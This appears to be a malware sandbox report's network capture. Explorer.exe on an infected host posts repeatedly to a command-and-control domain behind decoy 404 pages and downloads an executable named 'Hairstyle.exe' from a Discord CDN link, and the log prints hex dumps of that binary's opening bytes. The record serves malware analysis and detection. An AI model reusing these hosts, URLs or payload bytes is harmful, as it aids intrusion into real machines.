                                                                                                                                                        Dec 28, 2021 03:23:56.261097908 CET15787INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:56 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 45 0c a7 35 f4 eb 66 c1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 30I:82OTevE5fdP0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        67192.168.2.3498525.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:58.104228020 CET16330OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://veitjk.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 216
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:58.223556995 CET16331INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        68192.168.2.3498535.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:58.399112940 CET16332OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://htkfphhu.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 333
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:58.511137009 CET16332INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 69 07 f3 ad 89 a6 e4 1e b6 1b 91 67 a1 57 51 93 00 fd e0 26 f3 22 54 0d f3 ab 93 4b e2 16 87 1e 89 af 73 c6 3d ee b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 41I:82OOigWQ&"TKs=~0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        69192.168.2.3498585.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:24:02.528693914 CET17136OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://uhsewixtmk.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 275
                                                                                                                                                        Host: host-data-coin-11.com


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        7192.168.2.349868162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        70192.168.2.3498595.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        71192.168.2.3498605.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        72192.168.2.3498645.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        73192.168.2.3498665.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        74192.168.2.3498725.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        75192.168.2.3498735.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        76192.168.2.3498795.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        8192.168.2.349874155.248.231.246443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        9192.168.2.349877104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        0192.168.2.349819162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        2021-12-28 02:23:24 UTC0OUTGET /attachments/812323288264605709/924475642190397461/Hairstyle.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                        2021-12-28 02:23:24 UTC0INHTTP/1.1 200 OK
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:24 GMT
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Content-Length: 537600
                                                                                                                                                        Connection: close
                                                                                                                                                        CF-Ray: 6c475391aac52c01-FRA
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Age: 134171
                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                        Content-Disposition: attachment;%20filename=Hairstyle.exe
                                                                                                                                                        ETag: "ccbcf301b4a4c51fc6ac6108e1a0a702"
                                                                                                                                                        Expires: Wed, 28 Dec 2022 02:23:24 GMT
                                                                                                                                                        Last-Modified: Sun, 26 Dec 2021 01:36:09 GMT
                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                        x-goog-generation: 1640482569070203
                                                                                                                                                        x-goog-hash: crc32c=PSVQSg==
                                                                                                                                                        x-goog-hash: md5=zLzzAbSkxR/GrGEI4aCnAg==
                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                        x-goog-stored-content-length: 537600
                                                                                                                                                        X-GUploader-UploadID: ADPycdueFBCIcpXpwjjPhSfnwX7v2qpZYX17QNFW0kDTuRGuja_YYOsN5NFHyxf0P2m-HrTGiGB8CM7VeDA6wPv7sBk
                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                        2021-12-28 02:23:24 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 41 67 68 34 47 70 48 59 6e 6f 41 6e 70 6e 41 56 6c 46 6e 52 31 71 6b 45 45 74 33 6b 68 74 49 6f 75 57 6f 6d 30 51 4c 69 30 51 47 49 77 33 73 37 58 71 71 6f 4d 45 76 6a 51 73 31 39 31 56 6c 52 56 68 25 32 46 37 43 39 42 35 6b 7a 43 53 79 43 4e 65 31 53 35 68 4b 65 64 34 78 6b 34 61 64 7a 5a 66 44 67 48 59 30 6d 25 32 46 32 64 50 75 50 65 47 52 67 75 79 5a 34 7a 59 6a 4a 59 54 48 6f 67 78 53 45 32 6a 25 32 46 79 69 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Agh4GpHYnoAnpnAVlFnR1qkEEt3khtIouWom0QLi0QGIw3s7XqqoMEvjQs191VlRVh%2F7C9B5kzCSyCNe1S5hKed4xk4adzZfDgHY0m%2F2dPuPeGRguyZ4zYjJYTHogxSE2j%2Fyig%3D%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                        2021-12-28 02:23:24 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 02 78 ff c8 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2c 08 00 00 06 00 00 00 00 00 00 8e 4b 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELx0,K `@ @
                                                                                                                                                        2021-12-28 02:23:24 UTC2INData Raw: 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 f6 28 a9 00 00 06 28 5d 01 00 06 38 01 00 00 00 2a d0 27 00 00 02 7e 77
                                                                                                                                                        Data Ascii: *(*(**0****(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*0**((]8*'~w
                                                                                                                                                        2021-12-28 02:23:24 UTC4INData Raw: 00 00 06 12 06 09 11 04 11 05 1c 1f 09 1f 12 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0b 1f 0e 1f 13 06 28 93 00 00 06 12 04 11 05 11 06 09 16 1f 14 1f 14 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1b 1b 1f 15 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0a 1f 09 1f 16 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 0e 1f 17 06 28 93 00 00 06 12 04 11 05 11 06 09 1a 1f 14 1f 18 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1f 09 1b 1f 19 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0e 1f 09 1f 1a 06 28 93 00 00 06 12 05 11 06 09 11 04 19 1f 0e 1f 1b 06 28 93 00 00 06 12 04 11 05 11 06 09 1e 1f 14 1f 1c 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1f 0d 1b 1f 1d 06 28 93 00 00 06 12 06 09 11 04 11 05 18 1f 09 1f 1e 06 28 93 00 00 06 12 05 11 06 09 11 04 1d 1f 0e 1f 1f
                                                                                                                                                        Data Ascii: (((((((((((((
                                                                                                                                                        2021-12-28 02:23:24 UTC5INData Raw: 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f 18 62 05 11 07 18 58 91 1f 10 62 60 05 11 07 17 58 91 1e 62 60 05 11 07 91 60 13 06 11 04 16 13 04 25 28 a1 00 00 06 58 13 04 11 08 07 17 59 40 50 00 00 00 06 16 3e 49 00 00 00 11 04 11 06 61 13 0e 16 13 0f 38 2d 00 00 00 11 0f 16 3e 0c 00 00 00 11 0b 1e 62 13 0b 11 0c 1e 58 13 0c 08 11 0a 11 0f 58 11 0e 11 0b 5f 11 0c 1f 1f 5f 64 d2 9c 11 0f 17 58 13 0f 11 0f 06 3f cb ff ff ff 38 49 00 00 00 11 04 11 06 61 13 10 08 11 0a 11 10 20 ff 00 00 00 5f d2 9c 08 11 0a 17 58 11 10 20 00 ff 00 00 5f 1e 64 d2 9c 08 11 0a
                                                                                                                                                        Data Ascii: X8#>biXY`X?8.XXbXb`Xb``%(XY@P>Ia8->bXX__dX?8Ia _X _d
                                                                                                                                                        2021-12-28 02:23:24 UTC6INData Raw: 2b 00 58 fe 0e 28 00 fe 0c 29 00 1b 62 fe 0c 29 00 58 fe 0c 29 00 61 fe 0c 28 00 58 fe 0e 28 00 fe 0c 28 00 76 6c 6d 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 00 00 11 10 1e 62 13 10 11 11 1e 58 13 11 11 08 11 0f 11 14 58 11 13 11 10 5f 11 11 1f 1f 5f 64 d2 9c 11 14 17 58 13 14 11 14 11 06 3f c9 ff ff ff 38 4d 00 00 00 11 09 11 0a 61 13 15 11 08 11 0f 11 15 20 ff 00 00 00 5f d2 9c 11 08 11 0f 17 58 11 15 20 00 ff 00 00 5f 1e 64 d2 9c 11 08 11 0f 18 58 11 15 20 00 00 ff 00 5f 1f 10 64 d2 9c 11 08 11 0f 19 58 11 15 20 00 00 00 ff 5f 1f 18 64 d2 9c 11 0e 17 58 13 0e 11 0e 11 07 3f 26 fd ff ff 11 08 13 05 14 13 08 11 05 8e 69 1e 5b 13 0c 11 05 73 21 00 00 0a 73 38 01 00 06
                                                                                                                                                        Data Ascii: +X()b)X)a(X((vlmXY@S>Ka8.>bXX__dX?8Ma _X _dX _dX _dX?&i[s!s8
                                                                                                                                                        2021-12-28 02:23:24 UTC8INData Raw: 06 00 00 00 17 80 6a 00 00 04 11 05 2a 7e 6d 00 00 04 02 03 04 05 0e 04 0e 05 6f 2f 01 00 06 2a 00 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 2a 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 06 0a 00 00 01 13 30 07 00 53 00 00 00 00 00 00 00 d0 51 00 00 01 28 23 00 00 0a 72 48 0a 00 70 18 8d 24 00 00 01 25 16 d0 14 00 00 01 28 23 00 00 0a a2 25 17 d0 24 00 00 01 28 23 00 00 0a a2 28 6d 00 00 0a 14 18 8d 0a 00 00 01 25 16 02 8c 14 00 00 01 a2 25 17 03 a2 6f 6e 00 00 0a 74 4e 00 00 01 2a 00 1b 30 08 00 e5 63 00 00 12 00 00 11 20 ae 01 00 00 fe 0e 6e 00 38 00 00 00 00 fe 0c 6e 00 45 8c 02 00 00 5d 13 00 00 e0 57 00 00 f9 3c 00 00 be 45 00 00 86 10 00 00 d1 13 00 00 6f 19 00 00 e1 07 00 00 a4 06 00 00 3e
                                                                                                                                                        Data Ascii: j*~mo/**0(*&*0SQ(#rHp$%(#%$(#(m%%ontN*0c n8nE]W<Eo>
                                                                                                                                                        2021-12-28 02:23:24 UTC9INData Raw: 00 8a 13 00 00 ba 25 00 00 6e 2a 00 00 db 17 00 00 1b 3e 00 00 f2 52 00 00 14 05 00 00 f1 1a 00 00 6e 06 00 00 35 3b 00 00 bc 4b 00 00 3c 39 00 00 40 08 00 00 b5 1b 00 00 fe 42 00 00 4e 31 00 00 5f 40 00 00 15 56 00 00 4c 3f 00 00 07 3c 00 00 7f 15 00 00 d4 37 00 00 05 04 00 00 e8 22 00 00 6a 0a 00 00 59 02 00 00 41 13 00 00 d9 09 00 00 f4 36 00 00 e0 01 00 00 68 04 00 00 04 23 00 00 3d 14 00 00 e5 3d 00 00 1f 2b 00 00 62 4c 00 00 a5 10 00 00 30 3c 00 00 22 54 00 00 fa 31 00 00 ae 56 00 00 1b 18 00 00 b1 0e 00 00 e7 32 00 00 ac 37 00 00 7c 56 00 00 cb 55 00 00 4f 07 00 00 17 53 00 00 e1 18 00 00 24 13 00 00 d1 0b 00 00 59 21 00 00 69 1b 00 00 98 55 00 00 6f 38 00 00 73 1f 00 00 3b 31 00 00 62 22 00 00 80 55 00 00 c3 3b 00 00 75 44 00 00 c2 32 00 00 91 34
                                                                                                                                                        Data Ascii: %n*>Rn5;K<9@BN1_@VL?<7"jYA6h#==+bL0<"T1V27|VUOS$Y!iUo8s;1b"U;uD24
                                                                                                                                                        2021-12-28 02:23:24 UTC11INData Raw: 56 1e 00 00 c3 22 00 00 25 07 00 00 43 22 00 00 7f 31 00 00 99 40 00 00 fa 13 00 00 4c 03 00 00 0b 0e 00 00 1f 17 00 00 40 0c 00 00 75 0d 00 00 94 05 00 00 f1 51 00 00 c6 48 00 00 64 3b 00 00 42 1c 00 00 d9 1a 00 00 aa 38 00 00 2e 44 00 00 ee 1e 00 00 a0 14 00 00 38 58 13 00 00 20 1e 00 00 00 20 61 00 00 00 58 fe 0e 34 00 20 73 00 00 00 38 ad f5 ff ff 11 10 13 4f 20 60 01 00 00 28 1e 01 00 06 39 9a f5 ff ff 26 20 95 01 00 00 38 8f f5 ff ff 38 9a 44 00 00 20 2b 00 00 00 38 80 f5 ff ff 20 56 00 00 00 20 68 00 00 00 58 fe 0e 34 00 20 70 02 00 00 fe 0e 6e 00 38 5f f5 ff ff 11 14 17 1f 65 9c 20 dd 01 00 00 28 1e 01 00 06 3a 4e f5 ff ff 26 20 d1 00 00 00 38 43 f5 ff ff 20 a4 00 00 00 20 36 00 00 00 59 fe 0e 30 00 20 3d 01 00 00 28 1e 01 00 06 39 25 f5 ff ff 26
                                                                                                                                                        Data Ascii: V"%C"1@L@uQHd;B8.D8X aX4 s8O `(9& 88D +8 V hX4 pn8_e (:N& 8C 6Y0 =(9%&
                                                                                                                                                        2021-12-28 02:23:24 UTC12INData Raw: 00 0a 28 17 01 00 06 13 0f 20 cf 01 00 00 38 b7 f0 ff ff fe 0c 3e 00 20 08 00 00 00 20 25 00 00 00 20 49 00 00 00 58 9c 20 51 01 00 00 38 98 f0 ff ff 20 bf 00 00 00 20 3f 00 00 00 59 fe 0e 34 00 20 b1 01 00 00 28 1e 01 00 06 3a 7a f0 ff ff 26 20 8f 01 00 00 38 6f f0 ff ff 20 c3 00 00 00 20 13 00 00 00 58 fe 0e 30 00 20 4e 01 00 00 38 56 f0 ff ff fe 0c 45 00 20 06 00 00 00 20 96 00 00 00 20 32 00 00 00 59 9c 20 ec 00 00 00 38 37 f0 ff ff fe 0c 45 00 20 0d 00 00 00 fe 0c 34 00 9c 20 f7 00 00 00 38 1f f0 ff ff 11 02 16 28 c5 00 00 06 26 20 b3 00 00 00 38 0c f0 ff ff fe 0c 45 00 20 0c 00 00 00 fe 0c 34 00 9c 20 65 02 00 00 38 f4 ef ff ff fe 0c 3e 00 20 00 00 00 00 fe 0c 30 00 9c 20 43 01 00 00 28 1e 01 00 06 3a d7 ef ff ff 26 20 28 00 00 00 38 cc ef ff ff 11
                                                                                                                                                        Data Ascii: ( 8> % IX Q8 ?Y4 (:z& 8o X0 N8VE 2Y 87E 4 8(& 8E 4 e8> 0 C(:& (8
                                                                                                                                                        2021-12-28 02:23:24 UTC13INData Raw: 00 58 fe 0e 30 00 20 d5 00 00 00 38 61 eb ff ff fe 0c 3e 00 20 03 00 00 00 20 ee 00 00 00 20 4f 00 00 00 59 9c 20 89 01 00 00 28 1f 01 00 06 3a 3d eb ff ff 26 20 72 02 00 00 38 32 eb ff ff fe 0c 45 00 20 05 00 00 00 20 7e 00 00 00 20 2a 00 00 00 59 9c 20 3c 02 00 00 28 1e 01 00 06 3a 0e eb ff ff 26 20 bd 00 00 00 38 03 eb ff ff 7e 48 00 00 04 28 ef 00 00 06 16 9a 28 f0 00 00 06 13 03 20 fe 01 00 00 fe 0e 6e 00 38 de ea ff ff 20 32 00 00 00 20 24 00 00 00 58 fe 0e 30 00 20 81 00 00 00 38 c9 ea ff ff 11 09 11 6d 1d 58 11 0c 1d 91 9c 20 a9 00 00 00 38 b4 ea ff ff 11 1e 28 f3 00 00 06 11 17 59 13 6a 20 fb 00 00 00 28 1e 01 00 06 39 99 ea ff ff 26 20 30 01 00 00 38 8e ea ff ff fe 0c 45 00 20 0f 00 00 00 20 c2 00 00 00 20 40 00 00 00 59 9c 20 4f 00 00 00 28 1f
                                                                                                                                                        Data Ascii: X0 8a> OY (:=& r82E ~ *Y <(:& 8~H(( n8 2 $X0 8mX 8(Yj (9& 08E @Y O(
                                                                                                                                                        2021-12-28 02:23:24 UTC15INData Raw: ff fe 0c 45 00 20 0f 00 00 00 20 42 00 00 00 20 72 00 00 00 58 9c 20 cd 01 00 00 38 f8 e5 ff ff 11 09 11 6d 19 58 11 63 19 91 9c 20 a1 00 00 00 38 e3 e5 ff ff fe 0c 3e 00 20 10 00 00 00 20 51 00 00 00 20 17 00 00 00 58 9c 20 59 02 00 00 38 c4 e5 ff ff 20 02 00 00 00 20 1b 00 00 00 58 fe 0e 30 00 20 ac 00 00 00 38 ab e5 ff ff fe 0c 3e 00 20 1b 00 00 00 20 c8 00 00 00 20 42 00 00 00 59 9c 20 59 00 00 00 38 8c e5 ff ff 20 7d 00 00 00 20 29 00 00 00 59 fe 0e 30 00 20 69 00 00 00 38 73 e5 ff ff 38 4f f5 ff ff 20 75 00 00 00 28 1f 01 00 06 39 5f e5 ff ff 26 20 48 00 00 00 38 54 e5 ff ff 28 d3 00 00 06 20 66 01 00 00 38 45 e5 ff ff fe 0c 45 00 20 0d 00 00 00 20 b4 00 00 00 20 3c 00 00 00 59 9c 20 6a 01 00 00 38 26 e5 ff ff 16 13 13 20 a1 01 00 00 28 1f 01 00 06
                                                                                                                                                        Data Ascii: E B rX 8mXc 8> Q X Y8 X0 8> BY Y8 } )Y0 i8s8O u(9_& H8T( f8EE <Y j8& (
                                                                                                                                                        2021-12-28 02:23:24 UTC16INData Raw: 00 00 20 64 00 00 00 58 9c 20 16 01 00 00 fe 0e 6e 00 38 a4 e0 ff ff fe 0c 3e 00 20 16 00 00 00 fe 0c 30 00 9c 20 61 01 00 00 38 90 e0 ff ff 20 f4 f3 f2 f1 13 2f 20 15 00 00 00 28 1e 01 00 06 39 7a e0 ff ff 26 20 1e 00 00 00 38 6f e0 ff ff fe 0c 45 00 20 0b 00 00 00 20 1f 00 00 00 20 1c 00 00 00 59 9c 20 84 02 00 00 fe 0e 6e 00 38 48 e0 ff ff 2a 11 47 1a 11 28 12 28 28 b0 00 00 06 26 20 bb 01 00 00 38 34 e0 ff ff 11 2c 11 5f 5d 13 6b 20 52 00 00 00 38 23 e0 ff ff 11 2c 17 58 13 2c 20 78 00 00 00 28 1f 01 00 06 39 0e e0 ff ff 26 20 77 00 00 00 38 03 e0 ff ff 12 47 11 37 11 1e 28 f3 00 00 06 6a 58 11 17 6a 59 28 73 00 00 0a 20 f1 01 00 00 38 e3 df ff ff fe 0c 3e 00 20 19 00 00 00 20 c8 00 00 00 20 42 00 00 00 59 9c 20 d2 01 00 00 38 c4 df ff ff 11 06 8e 3a
                                                                                                                                                        Data Ascii: dX n8> 0 a8 / (9z& 8oE Y n8H*G(((& 84,_]k R8#,X, x(9& w8G7(jXjY(s 8> BY 8:
